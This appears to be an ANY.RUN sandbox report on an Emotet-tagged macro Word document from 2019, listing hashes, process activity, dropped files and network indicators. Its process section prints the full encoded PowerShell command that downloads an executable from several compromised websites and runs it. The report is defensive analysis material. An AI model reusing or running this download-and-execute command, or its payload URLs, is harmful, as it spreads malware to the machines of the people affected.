analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019-11-07 Queja V284-38874 EV296.doc

Full analysis: https://app.any.run/tasks/49eeb7c2-c4d0-4d22-a323-01f3e47e09ae
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: November 08, 2019, 14:47:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Enim ut hic., Author: Vladislav Gaparovic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 12:18:00 2019, Last Saved Time/Date: Thu Nov 7 12:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0
MD5:

DF1B6A42BDCA5BE66728F8C7C479DA54

SHA1:

31F0F194097A17F558A374ABA8B15DE586FA5A10

SHA256:

3E4579B7DE17867F47F78840EF90AB6AD429AD2004EDE48D9097F997F1474F96

SSDEEP:

6144:7CTJQGgyNVHNaqDSzGdD48+arOn76UwEt7XTB:7CTJQGgyNHaiWGe8+KOn+qt7N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 299.exe (PID: 2588)
      • 299.exe (PID: 2496)

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 4008)

    • Executed via WMI

      • powershell.exe (PID: 4008)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4008)

    • Creates files in the user directory

      • powershell.exe (PID: 4008)

    • Application launched itself

      • 299.exe (PID: 2588)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 944)

    • Reads settings of System Certificates

      • powershell.exe (PID: 4008)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 197
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 169
Words: 29
Pages: 1
ModifyDate: 2019:11:07 12:18:00
CreateDate: 2019:11:07 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Vladislav Gašparovic
Subject: -
Title: Enim ut hic.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe 299.exe no specs 299.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-11-07 Queja V284-38874 EV296.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4008powershell -enco JABSAGgAdwBsAG4AdQBhAGQAbgBuAGkAPQAnAFcAZQB5AHQAegBkAGcAYQAnADsAJABOAHAAcABkAHkAaQBlAHUAcgBjAHIAZQBoACAAPQAgACcAMgA5ADkAJwA7ACQAWgB3AGEAYgBmAHUAdwBjAGEAPQAnAEIAZgB4AG8AYwBtAG0AYwBxACcAOwAkAE0AYQBqAHoAcgB6AGoAYgBqAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAHAAcABkAHkAaQBlAHUAcgBjAHIAZQBoACsAJwAuAGUAeABlACcAOwAkAEQAeABtAGUAeQBlAGUAdABuAGsAawA9ACcAUQB1AHoAeQBzAHEAZwB1AHcAbwAnADsAJABFAGQAdQBmAGkAdABkAG8AagBhAHQAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAEIAQwBsAEkAZQBuAFQAOwAkAFMAbAB6AG8AcwB1AHQAdgBuAGEAYwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAcABmAGsAbwByAGUAYQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwA2AG4AZwBjADQALQB5AGoAcABnADgAawB1AC0ANQA4ADEAMQAvACoAaAB0AHQAcAA6AC8ALwAxAGMALgBwAGwALwBhAHcAbgBvAHIALwBCAG0AQQBaAGsASgBRAE4ALwAqAGgAdAB0AHAAcwA6AC8ALwBuAGUAeAB0AHMAbwBsAGUAdAByAGEAZABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AegBTAGoAbgB3AGsALwAqAGgAdAB0AHAAcwA6AC8ALwB1AGYAYQBpAHIAZgBhAHgALgBlAGQAdQAvADAAbgAxADIALwBhADEAYwAwAHAAMgA1ADEAawAtAGcAbgBxAHoALQA1ADEAMAA2ADcANAAxADkAOAAvACoAaAB0AHQAcABzADoALwAvAHMAYQB2AGUAdABhAHgALgBpAGQAZgBjAG0AZgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADIAegBrAGoAbwBtAHMANgAtAGUAbgBzADIANwBoAHcAZQAtADkAMQAvACcALgAiAHMAUABgAGwAaQB0ACIAKAAnACoAJwApADsAJABWAGsAYgB0AG4AZgBoAG8AbQBzAGMAbwA9ACcAUgB4AGgAcQB4AHIAbgBtAHgAaQBuAG4AagAnADsAZgBvAHIAZQBhAGMAaAAoACQAVABwAHcAYgBkAGkAYQB1ACAAaQBuACAAJABTAGwAegBvAHMAdQB0AHYAbgBhAGMAKQB7AHQAcgB5AHsAJABFAGQAdQBmAGkAdABkAG8AagBhAHQALgAiAGQAYABPAFcATgBsAE8AYABBAGQAZgBgAEkATABlACIAKAAkAFQAcAB3AGIAZABpAGEAdQAsACAAJABNAGEAagB6AHIAegBqAGIAagApADsAJABTAGcAaQBqAGsAZAB0AGQAegB6AD0AJwBEAHoAeQByAGsAeAB2AHoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABNAGEAagB6AHIAegBqAGIAagApAC4AIgBMAGUAbgBgAEcAdABIACIAIAAtAGcAZQAgADIANgAyADYAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYQBgAFIAVAAiACgAJABNAGEAagB6AHIAegBqAGIAagApADsAJABSAGwAZwBqAG4AcwBnAGEAdgA9ACcAVABtAHUAZgBxAHQAeQB1ACcAOwBiAHIAZQBhAGsAOwAkAFMAbwBqAG0AegBxAGQAcABuAGEAYwA9ACcAUgB5AGUAdABnAGsAdAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAZwBtAHgAZgBoAGMAYgBuAGYAcAB5AD0AJwBYAG8AYwBjAGsAaABoAGIAbgBsAGMAZwBsACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2588"C:\Users\admin\299.exe" C:\Users\admin\299.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Watson Subscriber for SENS Network Notifications
Exit code:
0
Version:
12.0.6606.1000
2496--809e8ef0C:\Users\admin\299.exe299.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Watson Subscriber for SENS Network Notifications
Version:
12.0.6606.1000
Total events
2 211
Read events
1 393
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
6
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA766.tmp.cvr
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\85UMA4S03JFE0GBYHIL4.temp
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Local\Temp\Cab6BB0.tmp
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Local\Temp\Tar6BB1.tmp
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Local\Temp\Cab6BC1.tmp
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Local\Temp\Tar6BC2.tmp
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Local\Temp\Cab6DC7.tmp
MD5:
SHA256:
4008powershell.exeC:\Users\admin\AppData\Local\Temp\Tar6DC8.tmp
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6922E5C.wmfwmf
MD5:CFE5A2A3CE5C86B0B14855979281111E
SHA256:29EBF28B992A2A38802E7B80FF3D318989DC36FD6B015FAD76E3F3867B7D8502
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CB81368.wmfwmf
MD5:E7CBC9AB1E522360D41217B2AD794873
SHA256:D72B874F4B1A9485A9A189B4BEF6249F8D59E2D60A233AE22EF4E73DC00499AD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
10
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4008
powershell.exe
GET
302
211.233.63.40:80
http://www.gpfkorea.org/wp-admin/s6ngc4-yjpg8ku-5811/
KR
suspicious
4008
powershell.exe
GET
404
211.233.63.40:80
http://www.gpfkorea.org/not_found
KR
html
54.6 Kb
suspicious
4008
powershell.exe
GET
200
205.185.216.10:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
57.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4008
powershell.exe
165.227.204.101:443
ufairfax.edu
Digital Ocean, Inc.
US
unknown
4008
powershell.exe
207.154.196.11:443
1c.pl
Digital Ocean, Inc.
DE
unknown
4008
powershell.exe
211.233.63.40:80
www.gpfkorea.org
LG DACOM Corporation
KR
suspicious
4008
powershell.exe
207.154.196.11:80
1c.pl
Digital Ocean, Inc.
DE
unknown
4008
powershell.exe
164.68.123.209:443
nextsoletrading.com
Cogent Communications
US
unknown
4008
powershell.exe
35.171.206.208:443
savetax.idfcmf.com
Amazon.com, Inc.
US
unknown
4008
powershell.exe
205.185.216.10:80
www.download.windowsupdate.com
Highwinds Network Group, Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
www.gpfkorea.org
  • 211.233.63.40
suspicious
1c.pl
  • 207.154.196.11
unknown
nextsoletrading.com
  • 164.68.123.209
unknown
ufairfax.edu
  • 165.227.204.101
unknown
savetax.idfcmf.com
  • 35.171.206.208
suspicious
www.download.windowsupdate.com
  • 205.185.216.10
  • 205.185.216.42
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
2019-11-07 Queja V284-38874 EV296.doc